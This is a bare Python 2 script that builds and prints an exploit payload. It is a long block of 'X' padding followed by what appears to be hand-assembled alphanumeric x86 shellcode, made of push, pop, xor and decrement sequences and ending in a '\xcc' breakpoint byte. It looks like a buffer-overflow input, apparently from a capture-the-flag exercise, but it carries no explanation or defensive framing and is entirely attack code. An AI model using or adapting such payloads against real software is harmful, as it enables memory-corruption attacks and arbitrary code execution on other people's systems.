#!/usr/bin/python
ans = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" \
    + "j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPY" \
    + "PZ" \
    + "R" \
    + "j0X5JCCX5Ul00P" \
    + "j0X5JRYY5U007PT" \
    + "j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH5CG005q800P" \
    + "j0X5kOOOPP" \
    + "j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH" \
    + "DDDDDDDDDDDD" \
    + "\xccu0"

print ans
